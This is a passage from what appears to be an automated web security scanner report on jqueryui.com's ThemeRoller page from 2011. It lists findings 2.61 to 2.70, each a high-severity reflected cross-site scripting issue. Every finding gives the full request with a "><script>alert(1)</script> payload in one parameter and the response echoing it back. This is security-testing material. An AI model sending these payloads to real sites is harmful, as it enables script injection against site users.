yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb" type="text/css" media="all" />
...[SNIP]...

2.61. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a818"><script>alert(1)</script>bc6a78482e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

2.62. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 276ad"><script>alert(1)</script>5df8c0fde9e was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTex
...[SNIP]...

2.63. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68fa"><script>alert(1)</script>a39040d10a4 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=
...[SNIP]...

2.64. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b805c"><script>alert(1)</script>db7f5730f61 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

2.65. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8cda"><script>alert(1)</script>529d59993df was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefau
...[SNIP]...

2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ca7"><script>alert(1)</script>19d3cb864a7 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=
...[SNIP]...

2.67. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec9bd"><script>alert(1)</script>b1d6a495bd5 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTexture
...[SNIP]...

2.68. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e01a9"><script>alert(1)</script>9aceb87732b was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

2.69. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31c8"><script>alert(1)</script>fa0c014bb49 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent
...[SNIP]...

2.70. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd043"><script>alert(1)</script>ac1313806c7 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

